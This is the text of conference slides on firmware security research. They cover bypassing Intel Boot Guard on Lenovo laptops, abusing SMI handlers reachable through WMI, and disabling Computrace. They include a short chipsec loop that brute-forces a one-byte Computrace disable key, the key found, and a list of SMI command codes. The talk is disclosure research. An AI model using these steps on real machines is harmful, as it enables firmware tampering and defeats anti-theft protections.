MODERN SECURE BOOT ATTACKS:

Presenter’s Name
BYPASSING HARDWARE ROOT OF
Presenter's Position

TRUST FROM SOFTWARE

Alex Matrosov
@matrosov
Leading Offensive Security REsearch at
Who We Are: Alex Matrosov
Former Security Researcher @Cylance @Intel @ESET

Doing Security REsearch since 1997

Book co-author nostarch.com/rootkits

@matrosov
 Agenda

Disclaimer
I don’t speak for my employer.
All opinions, information here
are mine responsibilities
😈 (include all bad jokes) 😈
REsearch Target
Agenda
 Agenda
What is Hardware Root of Trust?

Computrace Never Dies

✓ OS Enable/Disable
✓ Permanent Disabling is a joke o_O

SMI over WMI is too evil 😈

✓ SMM communications without ring-0
✓ WMI-based fileless FW rootkits?

EC is not a security boundary 🤦‍♂️

(*EC – Embedded Controller)
Hardware Root of Trust
WTF Hardware Root of Trust?
➢ Root of Trust baked in pure Hardware?
✓ Cant be extracted/modified from software (developed in RTL)?
✓ not flexible with OEM’s
✓ hard to support in the field (updates and etc.)
✓ hard to implement secure way to cooperate with firmware on the same chip

➢ In the most of the cases Hardware Root of Trust

it’s a mix between firmware and locked in the FUSE
value or by specific bit.

➢ Secure state transition between hardware and

firmware is hard. It’s always something missing.
UEFI vulns classification
UEFI Vulnerabilities

Result of Exploitation Compromised Supply Chain

Secure Boot Bypass BIOS Update Issues Weak Configuration

SMM Privilege Escalation Outdated BIOS with known issues Wrong Configured Protections

Not Authenticated BIOS Updates Not Secure Root of Trust

UEFI Firmware Implant

Implanted BIOS update image Malicious Peripheral Devices

Persistent Non-SMM (DXE, PEI)

Persistent SMM (DXE) Not Persistent SMM (shellcode)

https://medium.com/@matrosov/uefi-vulnerabilities-classification-4897596e60af
Boot Guard: Boot Flow in Perfect World

Locked in Hardware

CPU CPU Boot Guard Reset

Reset Microcode ACM Vector

Locked in BIOS

Secure Boot IBB

OS Loader
(DXE + BDS) (SEC + PEI)
HW Root of Trust: TPM is broken?
@uffeux @qrs

https://github.com/nccgroup/TPMGenie
@0x446f49

https://pulsesecurity.co.nz/articles/TPM-sniffing
HW Root of Trust: TPM is broken?

https://i.blackhat.com/asia-19/Thu-March-28/bh-asia-Seunghun-Finally-I-Can-Sleep-Tonight-Catching-Sleep-Mode-
Vulnerabilities-of-the-TPM-with-the-Napper.pdf
Boot Guard: Boot Flow in REAL World

Locked in Hardware

CPU CPU Boot Guard Reset

Reset Microcode ACM Vector

Locked in BIOS

Secure Boot IBB

OS Loader
(DXE + BDS) (SEC + PEI)
But world is not perfect :)

https://github.com/LongSoft/UEFITool
Why don’t lock everything in HW?

➢ Hardware not flexible and expensive

✓ OEM’s don’t like locked secrets (supply chain)
✓ The cost for the vulnerabilities very high (no updates)

➢ All the vendors reducing HW locked secrets

✓ Even one locked bit in HW allow to say about HW locked feature
✓ Mix Hardware + Firmware is common in actual implementation
HW manufacturing supply chain is very complex

https://www.blackhat.com/asia-19/briefings/schedule/index.html#intel-visa-through-the-rabbit-hole-13513
Intel Boot Guard:
New Ways to Bypass
How HW-based Root of Trust become a SW
➢ Recovery mode is evil 😈

➢ Secure transition Chain of Trust on different

boot stages is slow hard

➢ In most of the cases without hard reset Root

of Trust moves to pure software for performance

➢ Enterprise hardware need remote update tools

➢ Nobody use Intel BIOS Guard even Intel :)

How HW-based Root of Trust become a SW
➢ Recovery mode is evil 😈

➢ Secure transition Chain of Trust on different

boot stages is slow hard

➢ In most of the cases without hard reset Root

of Trust moves to pure software for performance

➢ Enterprise hardware need remote update tools

➢ Nobody use Intel BIOS Guard even Intel :)

How HW-based Root of Trust become a SW
➢ Recovery mode is evil 😈

➢ Secure transition Chain of Trust on different

boot stages is slow hard

➢ In most of the cases without hard reset Root

of Trust moves to pure software for performance

➢ Enterprise hardware need remote update tools

➢ Nobody use Intel BIOS Guard even Intel :)

How HW-based Root of Trust become a SW

https://embedi.org/blog/nuclear-explotion/
How HW-based Root of Trust become a SW

https://embedi.org/blog/nuclear-explotion/
How HW-based Root of Trust become a SW

https://embedi.org/blog/nuclear-explotion/
How HW-based Root of Trust become a SW

https://embedi.org/blog/nuclear-explotion/
How HW-based Root of Trust become a SW

https://2018.zeronights.ru/en/wp-content/uploads/materials/06-NUClear-explotion.pdf
Boot Guard Bypass
Platform Controller Hub (PCH)

Management Engine (ME)

RW UEFI Firmware Image

Key Manifest (KM) Initial Boot Block Manifest

Field Programing Fuse (FPF)
(IBBM)

hash of root OEM pub key (SHA-256)

key manifest security version IBBM security version number
number (SVN) (SVN)

hash of IBB pub key

hash of IBB (SHA-256)
(SHA-256)

OEM root pub key

IBBM pub key (RSA-2048)
(RSA-2048)

RSA signature on KM SVN RSA signature on IBBM SVN

+ +
hash of IBBM pub key hash of IBB
Boot Guard Bypass
Platform Controller Hub (PCH)

Management Engine (ME)

RW UEFI Firmware Image

Key Manifest (KM) Initial Boot Block Manifest

Field Programing Fuse (FPF)
(IBBM)

hash of root OEM pub key (SHA-256)

key manifest security version IBBM security version number
number (SVN) (SVN)

hash of IBB pub key

hash of IBB (SHA-256)
(SHA-256)

OEM root pub key

IBBM pub key (RSA-2048)
(RSA-2048)

RSA signature on KM SVN RSA signature on IBBM SVN

+ +
hash of IBBM pub key hash of IBB
Boot Guard Bypass
Platform Controller Hub (PCH)

Management Engine (ME)

RW UEFI Firmware Image

Key Manifest (KM) Initial Boot Block Manifest

Field Programing Fuse (FPF)
(IBBM)

hash of root OEM pub key (SHA-256)

key manifest security version IBBM security version number
number (SVN) (SVN)

hash of IBB pub key

hash of IBB (SHA-256)
(SHA-256)

OEM root pub key

IBBM pub key (RSA-2048)
(RSA-2048)

RSA signature on KM SVN RSA signature on IBBM SVN

+ +
hash of IBBM pub key hash of IBB
Boot Guard Bypass: LenovoPcdInit
Boot Guard: Boot Flow in ACTIVE manufacturing mode
Locked in Hardware

CPU CPU Boot Guard Reset

Reset Microcode ACM Vector

Locked in BIOS

Secure Boot IBB

OS Loader
(DXE + BDS) (SEC + PEI)
Boot Guard: Boot Flow in ACTIVE manufacturing mode
Locked in Hardware

CPU CPU Boot Guard Reset

Reset Microcode ACM Vector

Locked in BIOS

Secure Boot IBB

OS Loader
(DXE + BDS) (SEC + PEI)
Boot Guard Bypass: Where Lenovo PCD stored?
Boot Guard Bypass: Going deeper with SPI dump
Why vendors leave this “backdoors”?
➢ Creating recover process for broken BIOS updates
possible (even remotely).

➢ But leaving “backdoors” is always create another

problems even more serious.

➢ Enterprise market need stable solutions right? ☺

➢ Replace broken HW is expensive way but only one which

guarantees security process for system recovery
SMI over WMI is evil
How many exploits you need?

https://medium.com/@matrosov/dangerous-update-tools-c246f7299459
How this REsearch get started?

https://docs.microsoft.com/en-us/windows/desktop/cimwin32prov/win32-bios
How this REsearch get started?

https://docs.microsoft.com/en-us/windows/desktop/cimwin32prov/win32-bios
SMI over WMI is evil

https://download.lenovo.com/pccbbs/mobiles_pdf/kbl-r_deploy_01.pdf
SMI over WMI is evil

https://download.lenovo.com/pccbbs/mobiles_pdf/kbl-r_deploy_01.pdf
SMI over WMI is evil

https://download.lenovo.com/pccbbs/mobiles_pdf/kbl-r_deploy_01.pdf
Agenda
How this REsearch get started?
WTF LenovoSetupUnderOs (Smm/Dxe)?

➢ LenovoSetupUnderOsDxe (0D648466-36BD-42c6-B287-7C3BAA2575C0)
✓ Communicate with LenovoPasswordManagerDxe

➢ LenovoSetupUnderOsSmm (65A72030-B02E-4bf3-8424-BA5F2FC56DE7)
➢ Multiple WSMI Handlers (~12 SMI handlers):
✓ Get/Set BiosPassword
✓ Get/Set BiosSettings

➢ LenovoHiddenSetting
✓ ComputraceDisable
✓ CpuDebugEnable
Setup Automation SMI?

➢ ChangeConfiguration 0x04
➢ ChangePassword 0x81
➢ ChangeBootOrder 0xA7
➢ SecureBootConfiguration 0xAE

➢ It’s more: 0x0f, 0x80, 0x82, 0x9F, 0xB4/B6/B8

Setup Automation SMI?

➢ ChangeConfiguration 0x04
➢ ChangePassword 0x81
➢ ChangeBootOrder 0xA7
➢ SecureBootConfiguration 0xAE

➢ It’s more: 0x0f, 0x80, 0x82, 0x9F, 0xB4/B6/B8

Computrace Never Dies
How I back to my old Computrace REsearch
How I back to my old Computrace REsearch
https://github.com/REhints/Publications/tree/master/Conferences/UEFI%20Firmware%20Rootkits%20Myths%20and%20Reality
https://github.com/REhints/Publications/tree/master/Conferences/UEFI%20Firmware%20Rootkits%20Myths%20and%20Reality
Lenovo security configs
ComputraceSmiServices->Register Callbacks

https://github.com/REhints/Publications/tree/master/Conferences/UEFI%20Firmware%20Rootkits%20Myths%20and%20Reality
ComputraceSmiServices->Register Callbacks

https://github.com/REhints/Publications/tree/master/Conferences/UEFI%20Firmware%20Rootkits%20Myths%20and%20Reality
Computrace SMI Handlers

➢ ComputraceEnable = 0x85
➢ ComputraceDisable = 0x87
➢ ComputraceState = 0x88

➢ ComputraceEnableAction = 0x8d
➢ ComputraceDisableAction = 0x8e
ComputraceSmiServices->Register Callbacks
ComputraceSmiServices->Register Callbacks
ComputraceSmiServices->Register Callbacks
SmiComputraceEnable = 0x85
SmiComputraceDisable = 0x87
SmiComputraceDisable = 0x87
Brutforce Lenovo Computrace Disable Key

➢ Computrace Disable Secret Key

✓ 1 BYTE secret value ☺ stored in SPI flash (NVRAM)
✓ Can be different by laptop model line
(my sweet victims p50 and t540p has a different keys)

for i in range(0,256):
chipsec_util smi 0x0 0x85 0x0 hex(i)

Fuzz->Check->Repeat->Profit!
DisableSecretKey == 0x57 o_O
Embedded Controller is not
a security boundary
Summary:

The usability in enterprise world in many cases

the main enemy of security

The vendors understand “Permanent Disable” option

differently

When Hardware-based Root of Trust transfer the

state of Chain of Trust to software, it’s not
hardware anymore
Thank you for your attention!
@matrosov